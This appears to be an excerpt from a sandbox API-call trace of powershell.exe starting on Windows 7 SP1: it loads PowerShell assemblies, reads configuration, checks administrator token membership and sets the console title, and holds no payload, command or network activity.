	[0378.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0378.965] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0379.401] CoTaskMemAlloc (cb=0x104) returned 0x179750
	[0379.401] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x179750, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.402] CoTaskMemFree (pv=0x179750) 
	[0379.403] CoTaskMemAlloc (cb=0x104) returned 0x147a80
	[0379.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.403] CoTaskMemFree (pv=0x147a80) 
	[0379.684] CoTaskMemAlloc (cb=0x104) returned 0x147a80
	[0379.684] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.684] CoTaskMemFree (pv=0x147a80) 
	[0379.686] CoTaskMemAlloc (cb=0x104) returned 0x147a80
	[0379.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.686] CoTaskMemFree (pv=0x147a80) 
	[0379.686] CoTaskMemAlloc (cb=0x104) returned 0x147a80
	[0379.686] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0379.686] CoTaskMemFree (pv=0x147a80) 
	[0381.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0381.117] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0381.650] CoTaskMemAlloc (cb=0x104) returned 0x147a80
	[0381.650] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0381.650] CoTaskMemFree (pv=0x147a80) 
	[0381.654] CoTaskMemAlloc (cb=0x104) returned 0x147a80
	[0381.654] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147a80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0381.654] CoTaskMemFree (pv=0x147a80) 
	[0382.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0382.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0385.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0385.351] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0385.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0385.745] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0386.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0386.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0387.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0387.364] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x28d9e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0387.675] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0387.675] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0387.675] CoTaskMemFree (pv=0x147ca0) 
	[0387.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0387.679] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0388.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x28db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0388.037] SetErrorMode (uMode=0x1) returned 0x1
	[0388.037] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x28dd80 | out: lpFileInformation=0x28dd80*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0388.037] SetErrorMode (uMode=0x1) returned 0x1
	[0390.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28dbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.153] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0390.153] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.153] CoTaskMemFree (pv=0x147ca0) 
	[0390.155] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0390.155] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.156] CoTaskMemFree (pv=0x147ca0) 
	[0390.156] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0390.156] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.156] CoTaskMemFree (pv=0x147ca0) 
	[0390.158] CoCreateGuid (in: pguid=0x28e148 | out: pguid=0x28e148*(Data1=0x991f3449, Data2=0xa7a5, Data3=0x478d, Data4=([0]=0xaa, [1]=0x49, [2]=0x2, [3]=0xbc, [4]=0xef, [5]=0x50, [6]=0xe7, [7]=0x23))) returned 0x0
	[0390.161] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0390.161] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.161] CoTaskMemFree (pv=0x147ca0) 
	[0390.164] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0390.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.164] CoTaskMemFree (pv=0x147ca0) 
	[0390.166] CoTaskMemAlloc (cb=0x104) returned 0x147ca0
	[0390.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x147ca0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0390.166] CoTaskMemFree (pv=0x147ca0) 
	[0390.172] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0390.173] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x28ddf0 | out: lpConsoleScreenBufferInfo=0x28ddf0) returned 1
	[0390.178] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0390.721] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x28ddf0 | out: lpConsoleScreenBufferInfo=0x28ddf0) returned 1
	[0390.722] GetVersionExW (in: lpVersionInformation=0x28dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x28dd80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0390.724] GetCurrentProcess () returned 0xffffffffffffffff
	[0390.724] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x28de18 | out: TokenHandle=0x28de18*=0x320) returned 1
	[0390.728] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28dd38 | out: TokenInformation=0x0, ReturnLength=0x28dd38) returned 0
	[0390.728] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xe7260
	[0390.729] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xe7260, TokenInformationLength=0x4, ReturnLength=0x28dd38 | out: TokenInformation=0xe7260, ReturnLength=0x28dd38) returned 1
	[0390.730] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x28de98 | out: phNewToken=0x28de98*=0x31c) returned 1
	[0390.730] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x28dd38 | out: TokenInformation=0x0, ReturnLength=0x28dd38) returned 0
	[0390.730] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xe7290
	[0390.730] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xe7290, TokenInformationLength=0x4, ReturnLength=0x28dd38 | out: TokenInformation=0xe7290, ReturnLength=0x28dd38) returned 1
	[0390.731] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2d5fee8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x28dea8 | out: IsMember=0x28dea8) returned 1
	[0390.731] CloseHandle (hObject=0x31c) returned 1
	[0390.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.731] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.732] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0390.767] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.285] CoTaskMemAlloc (cb=0x804) returned 0x19f180
	[0391.285] GetConsoleTitleW (in: lpConsoleTitle=0x19f180, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0391.285] CoTaskMemFree (pv=0x19f180) 
	[0391.309] CoTaskMemAlloc (cb=0x804) returned 0x1b765080
	[0391.309] GetConsoleTitleW (in: lpConsoleTitle=0x1b765080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0391.310] CoTaskMemFree (pv=0x1b765080) 
	[0391.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.311] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.312] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0391.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.313] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.314] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0391.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x28d970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
